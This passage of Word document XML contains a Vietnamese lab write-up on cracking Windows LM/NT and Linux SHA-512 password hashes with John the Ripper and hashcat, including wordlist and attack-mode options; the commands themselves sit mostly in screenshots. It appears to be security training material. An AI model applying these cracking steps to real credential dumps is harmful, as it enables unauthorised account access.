          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16433D95" wp14:editId="2C9E2B36">
            <wp:extent cx="4505325" cy="1038225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="64874610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6109" name="Picture 1" descr="A close-up of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4505325" cy="1038225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21000463" w14:textId="0F29CA99" w:rsidR="00571DA2" w:rsidRDefault="00571DA2" w:rsidP="00247ABC">
      <w:r>
        <w:t>Xem tốc độ bẻ khỏa mật khẩu md5crypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B91FB2" w14:textId="7CD71370" w:rsidR="00571DA2" w:rsidRDefault="00571DA2" w:rsidP="00247ABC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6211BC40" wp14:editId="08889B5C">
            <wp:extent cx="6858000" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="81861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15655" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="847725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13577A35" w14:textId="4291B9D1" w:rsidR="00571DA2" w:rsidRDefault="00571DA2" w:rsidP="00571DA2">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bẻ khóa Window hashes sử dụng John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD291D0" w14:textId="368AC0B4" w:rsidR="00571DA2" w:rsidRDefault="00571DA2" w:rsidP="00571DA2">
      <w:r>
        <w:t>Chúng ta sẽ bẻ khóa một số mã hash trong file web01.hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12480C0B" w14:textId="325D1966" w:rsidR="00571DA2" w:rsidRDefault="00C36DD8" w:rsidP="00247ABC">
      <w:r>
        <w:t>Mặc định, John sẽ tập trung vào các mã LM hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369416E1" w14:textId="71C738E5" w:rsidR="00C36DD8" w:rsidRDefault="00B91294" w:rsidP="00247ABC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02DE9D8F" wp14:editId="3BDCA0D4">
            <wp:extent cx="6858000" cy="3041015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="6970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1474" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3041015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C58E76B" w14:textId="5D5451BF" w:rsidR="00B91294" w:rsidRDefault="00B91294" w:rsidP="00247ABC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06D0EC73" wp14:editId="1ECE8FCF">
            <wp:extent cx="6858000" cy="1161415"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="15869449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4943" name="Picture 1" descr="A computer screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1161415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A964C84" w14:textId="1F679FF1" w:rsidR="00B91294" w:rsidRDefault="00B91294" w:rsidP="00247ABC">
      <w:r>
        <w:t xml:space="preserve">John đã phát hiện hash ở dạng LM </w:t>
      </w:r>
      <w:r w:rsidRPr="00B91294">
        <w:t>nhưng cũng nhận ra rằng chúng có thể là "NT", "LM-opencl", hoặc "NT-opencl". Điều này cho thấy dữ liệu hash có thể tương thích với nhiều định dạng. Nếu biết chính xác định dạng hash, bạn nên sử dụng tùy chọn --format để chỉ định định dạng đó, giúp tối ưu hóa quá trình crack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A68BAC" w14:textId="4A7A8D94" w:rsidR="00B91294" w:rsidRDefault="00B91294" w:rsidP="00247ABC">
      <w:r>
        <w:t>. Lưu ý rằng mật khẩu mà John crack được chuyển đổi tất cả các ký tự thành chữ in hoa (để giảm đi sự phức tạp của mật khẩu). John crack 7 ký tự đầu của LM pwd tách biệt với 7 ký tự cuối, coi như 2 phần là 2 mật khẩu riêng biệt. Mật khẩu đầu được gán cho username:1 và mật khẩu 2 gán cho username:2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6112A1" w14:textId="558173DE" w:rsidR="00B91294" w:rsidRDefault="00B91294" w:rsidP="00247ABC">
      <w:r>
        <w:t>Ta để ý thấy mật khẩu cho hầu hết các tài khoản không có LM pwd. Tài khoản vberry có mật khẩu LM hash và John đã bẻ khóa nó. Mật khẩu cuối cùng cho tài khoản này chính là gộp 2 mật khẩu 1 và 2 mà John đã crack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C9F0F2" w14:textId="282C6710" w:rsidR="00B91294" w:rsidRDefault="00B91294" w:rsidP="00247ABC">
      <w:r>
        <w:t>Chạy lại câu lệnh một lần nữa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2426536D" w14:textId="5970D0A2" w:rsidR="00B91294" w:rsidRDefault="00A1080F" w:rsidP="00247ABC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5800C96A" wp14:editId="24FDC669">
            <wp:extent cx="6858000" cy="1851660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1930760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0069" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId70"/>
                    <a:srcRect t="14134"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1851660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3965B" w14:textId="196C1F4A" w:rsidR="00A1080F" w:rsidRDefault="00A1080F" w:rsidP="00247ABC">
      <w:r>
        <w:t>Nếu John đã crack một tài khoản thì nó sẽ không crack lại tài khoản đó nữa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673CD4AA" w14:textId="5FAFA86B" w:rsidR="00A1080F" w:rsidRDefault="00A1080F" w:rsidP="00247ABC">
      <w:r>
        <w:t>Để xem các pwd mà John đã crack, ta chạy nó cới option –show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E6DC13" w14:textId="77560128" w:rsidR="00A1080F" w:rsidRDefault="00A1080F" w:rsidP="00247ABC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3977531E" wp14:editId="3A7DC164">
            <wp:extent cx="6858000" cy="1446530"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="20365578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7803" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1446530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BDF1DE" w14:textId="12444FEE" w:rsidR="00A1080F" w:rsidRDefault="00A1080F" w:rsidP="00247ABC">
      <w:r>
        <w:t>Câu lệnh này tìm kiếm trong file john.pot cho các bản hash trong web01.hashes nên nó có thể in ra đầy đủ các password liên kết với các tài khoản. Thử kiểm tra file pot sử dụng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6359F844" w14:textId="1177CB90" w:rsidR="00A1080F" w:rsidRDefault="00A1080F" w:rsidP="00247ABC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BC8FB06" wp14:editId="2852F95C">
            <wp:extent cx="3552825" cy="981075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="5760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904" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3552825" cy="981075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD6AF9" w14:textId="5DCCFEDA" w:rsidR="0095079B" w:rsidRDefault="0095079B" w:rsidP="00247ABC">
      <w:r>
        <w:t xml:space="preserve">Thử sử dụng John để crack NT hash sử dụng option --format=nt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D58B839" w14:textId="1E4A2843" w:rsidR="0095079B" w:rsidRDefault="0095079B" w:rsidP="00247ABC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DF75B53" wp14:editId="4467E2D5">
            <wp:extent cx="6858000" cy="1952625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="162625878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58789" name="Picture 1" descr="A computer screen shot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1952625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="237D2A7A" w14:textId="0D4B27D3" w:rsidR="0095079B" w:rsidRDefault="0095079B" w:rsidP="00247ABC">
      <w:r>
        <w:t>Ta có thể thấy quá trình crack diễn ra chậm hơn. Mật khẩu của mục tiêu không có trong danh sách mật khẩu mặc định của John. Với mật khẩu định dạng NT thì nó sẽ không được đưa tất cả các ký tự sang chữ in hoa, vì vậy nên sẽ khó để crack hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441FF068" w14:textId="4B0E0A2D" w:rsidR="009A16C3" w:rsidRDefault="0095079B" w:rsidP="00247ABC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Trong trường hợp này, chúng ta đều có cả hai LM và NT hash. LM hash bị crack rất nhanh và cho đầu ra là mật khẩu in hoa. Chúng ta có thể sử dụng mật khẩu này với NT để lấy lại mật khẩu ban đầu. </w:t>
      </w:r>
      <w:r w:rsidR="009A16C3">
        <w:t>Chúng ta sẽ sử dụng option –loopback để sử dụng pot file (nơi lưu hash và mật khẩu đã được bẻ khóa) làm input cho việc crack NT pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194FCA73" w14:textId="2859C100" w:rsidR="009A16C3" w:rsidRDefault="009A16C3" w:rsidP="00247ABC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="164DEF0D" wp14:editId="12455C81">
            <wp:extent cx="6858000" cy="2006600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57074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6705" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2006600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67036E26" w14:textId="58C8A5C1" w:rsidR="009A16C3" w:rsidRDefault="009A16C3" w:rsidP="00247ABC">
      <w:r>
        <w:t>Đã crack thành công mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219CE1CB" w14:textId="683C02B9" w:rsidR="009A16C3" w:rsidRDefault="009A16C3" w:rsidP="009A16C3">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bẻ khỏa mật khẩu</w:t>
      </w:r>
      <w:r w:rsidR="0054519A">
        <w:t xml:space="preserve"> windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> với John và wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129EF493" w14:textId="77BB2535" w:rsidR="009A16C3" w:rsidRDefault="0054519A" w:rsidP="009A16C3">
      <w:r>
        <w:t>Ta không còn mật khẩu LM hash nào nữa nên ta sẽ chuyển qua tấn công mật khẩu NT hash. Ta sẽ sử dụng list mật khẩu rockyou.txt trong /opt/passwords/rockyou.txt với option --wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036338DA" w14:textId="6772B7A4" w:rsidR="0054519A" w:rsidRDefault="0054519A" w:rsidP="009A16C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36FBFED3" wp14:editId="21839B10">
            <wp:extent cx="6858000" cy="2635250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91008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4756" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2635250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C2ADD" w14:textId="11216772" w:rsidR="0054519A" w:rsidRDefault="0054519A" w:rsidP="009A16C3">
      <w:r>
        <w:t>Ta thấy có 10 user có mật khẩu NT hash trong file này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BE3FE4" w14:textId="43DBF8C4" w:rsidR="0054519A" w:rsidRDefault="0054519A" w:rsidP="0054519A">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bẻ khóa mật khẩu Linux với John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7363E7C5" w14:textId="18929169" w:rsidR="0054519A" w:rsidRDefault="0054519A" w:rsidP="0054519A">
      <w:r>
        <w:t xml:space="preserve">Chúng ta sẽ sử </w:t>
      </w:r>
      <w:r w:rsidR="004B1870">
        <w:t>crack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file password ~/labs/web10.shadow được lưu từ /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D87B1" w14:textId="248B954C" w:rsidR="0054519A" w:rsidRDefault="004B1870" w:rsidP="0054519A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19EB5682" wp14:editId="3361EF48">
            <wp:extent cx="6858000" cy="2253615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1517457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5764" name="Picture 1" descr="A screenshot of a computer error&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2253615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E3225F" w14:textId="7F1BE50D" w:rsidR="004B1870" w:rsidRDefault="004B1870" w:rsidP="0054519A">
      <w:r>
        <w:t>Như chúng ta đã thấy, John sẽ không crack pwd dựa trên danh sách mật khẩu mặc định của nó, ta sẽ sử dụng danh sách Rockyou một lần nữa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6588239B" w14:textId="0702CF84" w:rsidR="004B1870" w:rsidRDefault="004B1870" w:rsidP="0054519A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11DFC091" wp14:editId="1BB55A28">
            <wp:extent cx="6858000" cy="1655445"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="3101045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4529" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1655445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02500FF2" w14:textId="2823821C" w:rsidR="004B1870" w:rsidRDefault="004B1870" w:rsidP="0054519A">
      <w:r>
        <w:t xml:space="preserve">Trước đó John crack NT hash rất nhanh, nhưng ở đây thuật toán hash sha512 sẽ mất rất nhiều thời gian để bẻ khóa, thuật toán này thêm nhiều salts và hash nhiều lần, không giống như </w:t>
      </w:r>
      <w:r w:rsidR="00BF1028">
        <w:t>NT hash chỉ có 1 salt và 1 lần hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4A07A8" w14:textId="326872C8" w:rsidR="00BF1028" w:rsidRDefault="00BF1028" w:rsidP="00BF1028">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cơ bản về hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E93E20" w14:textId="570C4B14" w:rsidR="00BF1028" w:rsidRDefault="00BF1028" w:rsidP="00BF1028">
      <w:r>
        <w:t xml:space="preserve">Hãy xem ta nên sử dụng hashcat thế nào bằng option --help </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116BA60E" w14:textId="19B55E48" w:rsidR="00BF1028" w:rsidRDefault="00BF1028" w:rsidP="00BF1028">
      <w:r w:rsidRPr="0074017C">
        <w:t>Trong kết quả đầu ra, chúng ta có thể thấy rằng Hashcat yêu cầu</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CE2593" w14:textId="3807E7B7" w:rsidR="00BF1028" w:rsidRDefault="00BF1028" w:rsidP="00BF1028">
      <w:r w:rsidRPr="00BF1028">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-m</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve"> theo sau là </w:t>
      </w:r>
      <w:r>
        <w:t>hash-type</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">, được chọn từ hơn 275 loại </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hash </w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">mà chúng ta có thể bẻ khóa </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248464FA" w14:textId="22511F7D" w:rsidR="00BF1028" w:rsidRDefault="00BF1028" w:rsidP="00BF1028">
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">Tùy chọn </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1028">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve"> hỗ trợ các giá trị sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062285DE" w14:textId="7A812C81" w:rsidR="00BF1028" w:rsidRDefault="00BF1028" w:rsidP="00BF1028">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">0 : </w:t>
      </w:r>
      <w:r>
        <w:t>Straight</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00CA33F3">
        <w:t>Tấn công từ điển</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">, với các quy tắc được áp dụng cho chúng như được chỉ định bởi tùy chọn -r. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75764E37" w14:textId="5D91C152" w:rsidR="00BF1028" w:rsidRDefault="00BF1028" w:rsidP="00BF1028">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">1 : Kết hợp. Chế độ này sẽ lấy từng từ trong từ điển và nối nó vào từng từ trong từ điển, về cơ bản là bình phương số lượng mật khẩu từ một tệp từ. Nó cũng sẽ áp dụng các quy tắc được chỉ ra bởi tùy chọn -r (nếu có) cho các từ kết hợp. Ví dụ: letmeinpassword và </w:t>
      </w:r>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">letmein </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A39980" w14:textId="1DBE375B" w:rsidR="00BF1028" w:rsidRDefault="00BF1028" w:rsidP="00BF1028">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">3 : Brute Force. Chế độ này thử tất cả mật khẩu, lặp qua tất cả các ký tự. Ví dụ: 0000 , 0001 , 0002 , v.v. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D44B7B6" w14:textId="4165BB96" w:rsidR="00BF1028" w:rsidRDefault="00BF1028" w:rsidP="00BF1028">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0074017C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6 : Hybrid + Mask. Chế độ này sử dụng từ điển </w:t>
      </w:r>
      <w:r>
        <w:t>kết hợp bruteforce</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">. Ví dụ: letmein0000 , pass0000 , letmein0001 , v.v. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3048B6C2" w14:textId="4D940790" w:rsidR="00BF1028" w:rsidRDefault="00BF1028" w:rsidP="00BF1028">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t>rong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bài lab </w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">này, </w:t>
      </w:r>
      <w:r>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve"> sẽ sử dụng -a 0 làm hình thức tấn công phổ biến và đơn giản nhất.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sau đó ta</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve"> sẽ sử dụng tùy chọn -r để chỉ định các quy tắc sẽ thực hiện việc đọc sai từ trong từ điển, trong khi vẫn áp dụng </w:t>
      </w:r>
      <w:r w:rsidR="00A16098">
        <w:t xml:space="preserve">mode </w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t>0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4778EE" w14:textId="67C168EC" w:rsidR="00BF1028" w:rsidRDefault="00BF1028" w:rsidP="00BF1028">
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve">Tiếp theo, </w:t>
      </w:r>
      <w:r w:rsidR="00A16098">
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve"> tìm kiếm các số cụ thể</w:t>
      </w:r>
      <w:r w:rsidR="00A16098">
